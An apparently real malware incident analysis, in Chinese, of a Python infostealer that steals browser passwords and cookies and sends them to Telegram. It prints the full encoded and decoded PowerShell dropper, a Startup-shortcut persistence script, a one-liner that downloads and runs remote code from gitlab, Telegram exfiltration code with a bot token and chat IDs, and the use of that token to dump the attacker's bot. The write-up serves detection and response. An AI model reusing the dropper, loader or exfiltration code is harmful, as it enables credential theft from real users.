Try   HackMD

病毒 kiemdev05

EDR Log

在看 edr log 時看到有抓到一隻程式 synaptics.exe
查看行為會發現它建立許多 chrome 的子程式,並且連線到許多 IP
並且偷取各種瀏覽器密碼 C:\Users\admin\AppData\Local\Temp\[TW_某IP] 電腦名稱.zip

  1. 執行 python payload sup02.entrypoint
  2. DNS resolved gitlab.com
  3. 連線
  4. 取得 chrome 資訊
  5. 檔案建立 login_db, 電腦名稱, 電腦名稱\All_Passwords.txt
  6. 檔案刪除 login_db, cards_db
  7. taskkill chrome.exe
  8. 執行 python 建立 chrome remote-debug
  9. 修改 chrome registry key
  10. edge
  11. DNS resloved adsmanager.facebook.com, graph.facebook.com, mbasic.facebook.com, www.facebook.com
  12. 連線
  13. 檔案建立 Facebook_Cookies.txt
  14. DNS resloved ip-api.com
  15. 檔案建立 Temp[TW_某IP] 電腦名稱.zip
  16. 修改檔案 Temp[TW_某IP] 電腦名稱.zip
  17. DNS resloved api.telegram.org
  18. 連線
  19. 將所有產生的檔案刪除,如 txt/zip

這些操作都在執行後的兩分鐘內完成

由 sup02.entrypoint 執行建立的檔案,依照看到的建立時間往下排

C:\Users\admin\AppData\Local\Temp\login_db
C:\Users\admin\AppData\Local\Temp\電腦名稱\All_Passwords.txt
C:\Users\admin\AppData\Local\Temp\電腦名稱
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Chrome_Profile 1.txt
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Chrome_Default.txt
C:\Users\admin\AppData\Local\Temp\cards_db
C:\Users\admin\AppData\Local\Temp\電腦名稱\Cookies Browser\Edge_Default.txt
C:\Users\admin\AppData\Local\Temp\PC-C002292\Facebook_Cookies.txt
C:\Users\admin\AppData\Local\Temp\[TW_某IP] 電腦名稱.zip

在 edr log 上看到從電腦連線出去的相關事件 IP
 
直接連線
172.65.251.78:443 gitlab.com
127.0.01:9222
31.13.87.1:443
31.13.87.36:443
208.95.112.1:80 ip-api.com
149.154.167.220:443 api.telegram.org
 
建立chrome 連線 127.0.0.1:9222 去瀏覽網站
142.250.198.78:80
142.250.204.35:443
142.250.196.196:443
74.125.204.84:443
142.250.204.42:443
142.250.204.46:443
142.250.77.10:443
142.250.198.78:443
142.250.66.68:443
142.250.198.74:443
142.250.157.188:5228
142.250.196.206:443
142.250.196.195:443
 
建立 edge 連線 127.0.0.1:9222 去瀏覽網站
13.107.42.16:443
204.79.197.203:443
13.107.21.239:443
203.69.81.97:443
203.69.81.152:443
20.255.46.225:443
204.79.197.237:443
203.69.81.155:443
204.79.197.203:443
61.220.62.226:443
203.74.95.35:443
210.71.227.123:443
3.169.137.63:443
52.231.230.148:443
104.116.18.28:443
20.42.73.26:443
20.24.121.134:443
104.116.16.155:443
40.104.20.2:443

往前找會找到 explorer.exe 執行 "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)" 這段指令

並且可以看到它是由 lnk 檔案執行,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk 路徑在 startup 底下,會在開機時執行

連線電腦查看

實際連接到電腦上查看,C:\Users\Public\ChromeApplication\synaptics.exe 底下有

  1. DLLs 資料夾
  2. Lib 資料夾
  3. definitions.py
  4. python310.dll
  5. synaptics.exe
  6. vcruntime140.dll

Lib 底下為 python library

WindowsSecurity.lnk 的指令為 "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"

而檢查 synaptics.exe 得知為 pythonw.exe,版本為 3.10.11

並有執行 OMENScan/AChoirX: ReWrite of AChoir in Go for Cross Platform 來獲取鑑識資料

其他資訊調查

查看 https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint
可以看到主程式經過混淆

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c%1Cm*|PH5ognzVzu}zY<71~YU3R9OlSzhTNU|hA48c4|3_=1lf}#u11PBcXNq`VTbcC~_>!u^R-XQZb-=d$OE-N~|H*h~fU$yo=$LTD0boUFaO~CpgmZUXn{kQz`M}Oah?^gJB|L6by`V#y&_`ttdpI=|zUW*s&^+zw^_t(qI|Mq_dr|_+AUz8X1MS1=0>tDY7*H>U*U|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|`_?r>Pg=m4C6md3||%sUMUNzkPjuS-kLXc|N|``uuxc!n2f5#z*1fd-_TE^qzheKEJ15317XZUkhKqr{4(Qyr(}Be)OJxD}4K&{#f|&d-|R5-Fx~I;V19uPlcbpr+*^+$$R=U;b&p`+4xiQ&xAjFeY^Kp#%J^A!q4CRwecU!UkJZ2e<}R({rfk@pPPRn{KdO}Wc<qfweahAe{1}u`B%bUnSU+(wfQ%~-@G6DvGKR&Z-n2x`#U3I{+;l5@BWDqHDf}|j0<ryAtcPd7yjN%3d#51erlx5w2(G4LdN_D;UB_df1+lUpQ+i+C*@C-Kl`Uo!apiMSN_94y$JtN`GxY!Fol#qSN<YQVdYoKufsH_{H5|&VVYMz|MSn4zy6n3p`iSY^0(m;M9nL|Q47EQAQV+ZExxt2@`-*)MSl1C^78V#@ckluw6>?;eF#OSUcdaQ?5LuruH=Jdsj{aXtnlEEq+&r)<%6Q8K79G)?nL;@k8Md;Ho4W#6y-3-..................

觀察 gitlab project 頁面,可以看到還有一隻 zk.entrypoint

image

並且此使用者只建立此 project

image

使用 kiemdev05 搜尋,可以找到

  1. X 上的 StrikeReady Labs:「One of our favorite hunts is flagging on language-specific content. Although non-english attacks are not rare, when you combine with prevalence, it can be be a good thread. This susp VN actor is targeting in Romanian. Zip drops a pass protected rar, pass is "kiemdev05" https://t.co/aCaNNnHj9s」 / X
    這篇貼文寫說此 ID 的使用者可能來自越南
  2. Find method to Decompile .NET Core Single File - Exetools
    這篇貼文的發文者使用相同 ID,在越南

使用 "blackhat_code/software" - Google 搜尋,可以找到 Automated Malware Analysis - Joe Sandbox Cloud Basic

在 IoC 頁面中可以找到 WindowsSecurity.lnk,是由 powershell 建立,大概可以確定此病毒是同一隻

image

查看是如何開始的,可以看到由 Lakatos, K#U00f6ves and Partners.bat 開始執行
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lakatos, K#U00f6ves and Partners.bat" "

image

Lakatos, K#U00f6ves and Partners.bat 的內容如下

powershell  -ep by"pa"ss -w hi"dd"en -enc ZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAI"AAgACAAIAAkAFMAaABvAHcAVwBpAG"4AZABvAHcAQQBzAHkAbgBjAEMAbwBkAGUAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACwAIABpAG4AdAAgAG4AQwBtAGQAUwBoAG8AdwApADsAJwANAAoAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0ATQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAQwBvAGQAZQAgAC0AbgBhAG0AZQAgAFcAaQBuADMAMgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAFAAYQBzAHMAVABoAHIAdQANAAoAIAAgAA0ACgAgACAAIAAgACQAaAB3AG4AZAAgAD0AIAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlAA0ACgAgACAAIA"AgAGkAZgAgACgAJABoAHcA"bgBkACAALQBuAGUAIABbAFMAeQBzAHQAZQBtAC4ASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwApACAAewANAAoAIAAgACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsADQAKACAAIAANAAoAIAAgACAAIAAgACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAATgBlAHcALQBHAHUAaQBkAA0ACgAgACAAIAAgACAAIAAkAEgAbwBzAHQALgBVAEkALgBSAGEAdwBVAEkALgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUADQAKACAAIAAgACAAIAAgACQAUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgADEAMAAyADQADQAKACAAIAAgACAAIAAgACQAVABlAHIAbQBpAG4AYQBsAFAAcgBvAGMAZQBzAHMAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAAtAGUAcQAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlACAAfQApAA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACQAaAB3AG4AZAAg"AD0AIAAkAFQAZQByAG0A"aQBuAGEAbABQAHIAbwBjAGUAcwBzAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQANAAoAIAAgACAAIAAgACAAaQBmACAAKAAkAGgAdwBuAGQAIAAtAG4AZQAgAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBhAGkAbABlAGQAIAB0AG8AIABoAGkAZABlACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcALgAiAA0ACgAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAB9AA0ACgBIAGkAZABlAC0AQwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwANAAoAJABkAHMAdAAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAQwBoAHIAbwBtAGUAQQBwAHAAbABpAGMAYQB0AGkAbwBuACcAOwAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEYAaQBsAGUAUwB5AHMAdABlAG0AOwAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGQAcwB0ACkAIAB7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAiACQAZABzAHQAXAAqACIAIAB9ACAAZQBsAHMAZQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBGAG8AcgBjAGUAIAAkAGQAcwB0ACAAfQANAAoARABvAGMAdQBtAGUAbgB0AF8AUwBlAGMAdQByAGUAXAByAGEAcgAuAGUAeABlACAAeAAgAEQAbwBjAHUAbQBlAG4AdABfAFMAZQBjAHUAcgBlAFwAcwBlAGMAdQByAGUAZABvAGMALgByAGEAcgAgACIAQ"wA6AFwAVQBzAGUAcgBz"AFwAUAB1AGIAbABpAGMAXABDAGgAcgBvAG0AZQBBAHAAcABsAGkAYwBhAHQAaQBvAG4AXAAiACAALQBwACIAawBpAGUAbQBkAGUAdgAwADUAIgANAAoADQAKACQAcwAgAD0AIAAkAHAAYQB5AGwAbwBhAGQAIAA9ACAAIgBpAG0AcABvAHIAdAAgAHIAZQBxAHUAZQBzAHQAcwA7AGUAeABlAGMAKAByAGUAcQB1AGUAcwB0AHMALgBnAGUAdAAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGwAYQBiAC4AYwBvAG0ALwBiAGwAYQBjAGsAaABhAHQAXwBjAG8AZABlAC8AcwBvAGYAdAB3AGEAcgBlAC8ALQAvAHIAYQB3AC8AbQBhAGkAbgAvAHMAdQBwADAAMgAuAGUAbgB0AHIAeQBwAG8AaQBuAHQAJwAsACAAdgBlAHIAaQBmAHkAPQBGAGEAbABzAGUAKQAuAHQAZQB4AHQAKQAiADsAJABvAGIAagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAOwAkAGwAaQBuAGsAIAA9ACAAJABvAGIAagAuAEMAcgBlAGEAdABlAFMAaABvAHIAdABjAHUAdAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHQAYQByAHQAIABNAGUAbgB1AFwAUAByAG8AZwByAGEAbQBzAFwAUwB0AGEAcgB0AHUAcABcAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAGkAdAB5AC4AbABuAGsAIgApADsAJABsAGkAbgBrAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAPQAgADcAOwAkAGwAaQBuAGsALgBUAGEAcgBnAGUAdABQAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABDAGgAcgBvAG0AZQBBAHAAcABsAGkAYwBhAHQAaQBvAG4AXABzAHkAbgBhAHAAdABpAGMAcwAuAGUAeABlACIAOwAkAGwAaQBuAGsALgBJAGMAbwBuAEwAbwBjAGEAdABpAG8AbgAgAD0AIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAIAAoAHgAOAA2ACkAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAXABBAHAAcABsAGkAYwBhAHQAaQBvAG4AXABtAHMAZQBkAGcAZQAuAGUAeABlACwAMQAzACIAOwAkAGwAaQBuAGsALgBBAHIAZwB1AG0AZQBuAHQAcwAgAD0AIAAiAC0AYwAgAGAAIgAkAHAAYQB5AGwAbwBhAGQAYAAiACIAOwAkAGwAaQBuAGsALgBTAGEAdgBlACgAKQANAAoAYwBtAGQAIAAvAEMAIABzAHQAYQByAHQAIAAiACIAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAQwBoAHIAbwBtAGUAQQBwAHAAbABpAGMAYQB0AGkAbwBuAFwAcwB5AG4AYQBwAHQAaQBjAHMALgBlAHgAZQAiACAALQBjACAAYAAiACQAcABhAHkAbABvAGEAZABgACIA

將其進行 base64 decode 後得到

function Hide-ConsoleWindow() {
    $ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
    $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
  
    $hwnd = (Get-Process -PID $pid).MainWindowHandle
    if ($hwnd -ne [System.IntPtr]::Zero) {
      $ShowWindowAsync::ShowWindowAsync($hwnd, 0)
    } else {
  
      $UniqueWindowTitle = New-Guid
      $Host.UI.RawUI.WindowTitle = $UniqueWindowTitle
      $StringBuilder = New-Object System.Text.StringBuilder 1024
      $TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle })
     
      $hwnd = $TerminalProcess.MainWindowHandle
      if ($hwnd -ne [System.IntPtr]::Zero) {
        $ShowWindowAsync::ShowWindowAsync($hwnd, 0)
      } else {
        Write-Host "Failed to hide the console window."
      }
    }
  }
Hide-ConsoleWindow
$dst = 'C:\Users\Public\ChromeApplication'; Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"

$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"

可以看到這段腳本,建立 C:\Users\Public\ChromeApplication 並將 Document_Secure\securedoc.rar 放入

$dst = 'C:\Users\Public\ChromeApplication'; 
Add-Type -AssemblyName System.IO.Compression.FileSystem; 
if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"

建立 WindowsSecurity.lnk,並將 payload 放入後執行。
查看防火牆 log,確實在建立之後有進行 tg bot 連線

$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";
$obj = New-Object -ComObject WScript.Shell;
$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");
$link.WindowStyle = 7;
$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";
$link.Arguments = "-c `"$payload`"";
$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"

image
image

完整事件流程圖

未命名绘图

鑑識調查

從上面跟下面大概可以知道整個病毒的運作流程,我想找出幾個資訊

  1. 寄送的 telegram 帳號
  2. 是否有 loader(更早的病毒) 將這些檔案載入
  3. powershell payload 是如何執行的
  4. 攻擊者是誰
  5. 能否回復 password.zip
  6. 能否找到 Document_Secure\securedoc.rar
  7. bat 是如何進入並執行的

從電腦查看可以看到 WindowsSecurity.lnk 的建立時間,時間為兩週前建立
且由於已經重啟過,所以無法查看更早的紀錄
渗透技巧——Windows下NTFS文件的USN Journal
想要查看文件的修改紀錄,可以參考這篇文章,查看 USN Journal

看看能否解析 $LogFile$MFT 檔案

LogFile

jschicht/LogFileParser: Parser for $LogFile on NTFS 可以提取各項內容存成 csv 檔案查看
Free Version 可以把 evtx 全部匯入一起查看,但是好像無法查看 $LogFile 內容

MFT

kacos2000/MFT_Record_Viewer: $MFT Record Viewer
Master File Table and Computer Forensics
Windows Master File Table (MFT) in Digital Forensics — MCSI Library

LastActivity.csv

這份文件有紀錄相當完整的時間軸操作
可以看到開關機時間與休眠時間,確實是有在該時間點重開機

EVTX

Download LogViewPlus 比較好用,可以把所有檔案合併起來查看
NVISOsecurity/evtx-hunter: evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files. 可以用來查看統計資料

在 Windows PowerShell 中看到上面提到的 powershell payload 執行紀錄,同個時間為 WindowsSecurity.lnk 建立時間

"Registry" 提供者為 Started。

詳細資料: 
	ProviderName=Registry
	NewProviderState=Started

	SequenceNumber=1

	HostName=ConsoleHost
	HostVersion=5.1.19041.5247
	HostId=1f132efa-416b-4ce6-b7cf-b48accaa8911
	HostApplication=powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....
	EngineVersion=
	RunspaceId=
	PipelineId=
	CommandName=
	CommandType=
	ScriptName=
	CommandPath=
	CommandLine=

到這邊就找不下去了,沒有 file operation log,並且有重開機導致資料不完整。
無法找到 .bat 檔案的建立與執行,以及 Document_Secure\securedoc.rar 跟 cmdline,最早只能追溯到 powershell payload 執行
可能還有更前面的執行檔會進行載入

記憶體分析

因使用正常的 python 函式庫,並且會將產生檔案刪除,導致無法透過記憶體分析尋找相關資訊

sup02.entrypoint 分析

詳細內容請看 kiemdev05 sup02.entrypoint 分析
可以看到裡面有 statut='Không Rõ Trạng Thái'
這是越南文,表示 狀態未知,可以更確定是越南人所寫

另外一隻 zk_entrypoint 雖然沒有出現,但也分析完了,詳情 kiemdev05 zk.entrypoint

telegram api

在 source code 可以看到會將偷取到的檔案使用 tg bot 傳送出去












TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'

CHAT_ID_NEW='-1002426006531'
CHAT_ID_RESET='-1002489276039'
    with open(archive_path,'rb') as f:
        response=requests.post(
            f"https://api.telegram.org/bot{TOKEN_BOT}/sendDocument",
            params={'chat_id':CHAT_ID, 'caption':message_body, 'protect_content':True, 'disable_web_page_preview':True},
            files={'document':f},
        )
        response.raise_for_status()

查看是否有資訊可以從 api 中取得
這是查看此頻道訊息的 api https://api.telegram.org/bot{token}/getUpdates

嘗試從 tg bot api 收集資訊

  1. Telegram Bot API 相關 method
  2. GitHub - soxoj/telegram-bot-dumper: 🔪 Dumper & ripper for Telegram bots by token 此工具可以直接將資訊提取並監聽
ID: 7688244721
Name: data ve ne
Username: @data_015_bot - https://t.me/data_015_bot
Dumping history from 200 to 0...
Empty messages x4
[5][830655559][2024-12-21 15:41:19+00:00] /start
====================
NEW USER DETECTED: 830655559
First name: None
Last name: None
User has no username
Empty messages x6
[8][6893446818][2024-12-21 18:44:24+00:00] /start
====================
NEW USER DETECTED: 6893446818
First name: supremeo
Last name: rodriguo
Username: @rodriguotavone585353853 - https://t.me/rodriguotavone585353853
Empty messages x8
[11][7063152197][2024-12-24 01:44:39+00:00] /start
====================
NEW USER DETECTED: 7063152197
First name: C0NJURER
Last name: None
Username: @C0NJURERR - https://t.me/C0NJURERR
Saving photo 4902486628019318169...
Empty messages x8
[12][1079398712][2025-01-04 15:57:40+00:00] MessageActionChatAddUser(users=[7688244721])
Empty messages x8
[13][1079398712][2025-01-04 15:58:38+00:00] MessageActionChatMigrateTo(channel_id=2271537412)
Empty messages x8
[14][1079398712][2025-01-04 15:59:17+00:00] MessageActionChatCreate(title='Data_Reset', users=[1079398712, 7688244721])
Empty messages x8
[15][1079398712][2025-01-04 15:59:17+00:00] MessageActionSetMessagesTTL(period=2678400)
Empty messages x8
[16][1079398712][2025-01-04 16:00:07+00:00] MessageActionChatMigrateTo(channel_id=2399198378)
Empty messages x191
Saving history of 830655559 as a text...
Saving history of 6893446818 as a text...
Saving history of 7063152197 as a text...
Saving history of 4761447413 as a text...
Saving history of 4615328488 as a text...
History was fully dumped.
Press Ctrl+C to stop listeting for new messages...

/getchatadministrators

{
  "ok": true,
  "result": [
    {
      "user": {
        "id": 7688244721,
        "is_bot": true,
        "first_name": "data ve ne",
        "username": "data_015_bot"
      },
      "status": "administrator",
      "can_be_edited": false,
      "can_manage_chat": true,
      "can_change_info": false,
      "can_delete_messages": false,
      "can_invite_users": false,
      "can_restrict_members": false,
      "can_pin_messages": false,
      "can_manage_topics": false,
      "can_promote_members": false,
      "can_manage_video_chats": false,
      "can_post_stories": false,
      "can_edit_stories": false,
      "can_delete_stories": false,
      "is_anonymous": false,
      "can_manage_voice_chats": false
    },
    {
      "user": {
        "id": 1079398712,
        "is_bot": false,
        "first_name": ".",
        "username": "senju822222"
      },
      "status": "creator",
      "is_anonymous": false
    }
  ]
}

可以參考這篇文章 How We Were Able to Infiltrate Attacker Telegram Bots

process tree

image
image

除了在電腦上看到的痕跡,此 sandbox 還有紀錄其他的程式

  1. csc.exe
  2. cvtres.exe

csc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Csc | LOLBAS 寫說此程式是 .NET Framework 用於編譯 C# 程式碼的二進位文件

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.cmdline"

aflg023p.cmdline 應該是一個 c# 程式碼文件

cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

它將 .res 資源檔案轉換為通用物件檔案格式(COFF.obj 物件文件,連結器可以將其連結到完成的.exe PE 應用程式檔案中。
用於將資源檔案 (.res) 轉換為可以使用連結器連結的編譯物件。

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1DB.tmp" "c:\Users\user\AppData\Local\Temp\aflg023p\CSCBA3711F82A4D46E8AC7D47C2390FF68.TMP"

這些工具是進行 Living Off the Land Binaries And Scripts 的常用工具,詳細攻擊手法可以參考這篇文章 New Tool to Add to Your LOLBAS List: cvtres.exe - SANS Internet Storm Center

aflg023p.cmdline

./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.dll" /debug- /optimize+ /warnaserror /optimize+  "C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.0.cs"

Lakatos, K#U00f6ves and Partners.bat

MalwareBazaar | Download malware samples
可以看到與上面所看到的內容相同

image

使用此 bat 的 hash 進行搜尋,可以找到 a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage

image
image
可以看到 cmdline 的檔名會不斷變換

network

在這篇報告可以看到有進行網路活動 a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage

image
但僅有紀錄 DNS

IoC

以下資訊僅針對此病毒與受害電腦上所出現之特徵

攻擊指令

  1. powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....
  2. "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
  3. taskkill /F /IM browser.exe
  4. browser.exe --remote-debugging-port=9222 --restore-lastest-session --user-data-dir={path} --profile-directory={profile} --remote-allow-origins=* --headless --window-size=1,1 --disable-gpu --no-sandbox

存取檔案

  1. All_Passwords.txt
  2. login_db
  3. cards_db
  4. Temp[TW_某IP] 電腦名稱.zip
  5. Facebook_Cookies.txt
  6. profiles.ini
  7. logins.json
  8. key4.db
  9. cookies.sqlite
  10. Startup\WindowsSecurity.lnk
    • "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
  11. C:\Users\Public\ChromeApplication
    • DLLs\
    • Lib\
    • definitions.py
    • python310.dll
    • synaptics.exe(pythonw.exe 3.10.11)
    • vcruntime140.dll

連線 IP or URL

  1. http://localhost:9222/json
  2. https://api.telegram.org/bot{TOKEN_BOT}/sendDocument
    • 149.154.167.220:443
  3. http://ip-api.com/json/?fields=8195
    • 208.95.112.1:80
  4. .facebook.com
    • adsmanager
    • graph
    • mbasic
    • business
  5. https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint
    • 172.65.251.78:443

